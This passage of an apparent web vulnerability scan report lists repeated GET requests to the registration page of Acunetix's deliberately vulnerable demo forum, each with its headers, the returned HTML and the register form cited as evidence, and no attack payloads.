--></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=49 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=50 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=51 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=52 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=53 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=54 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=55 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D55" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input 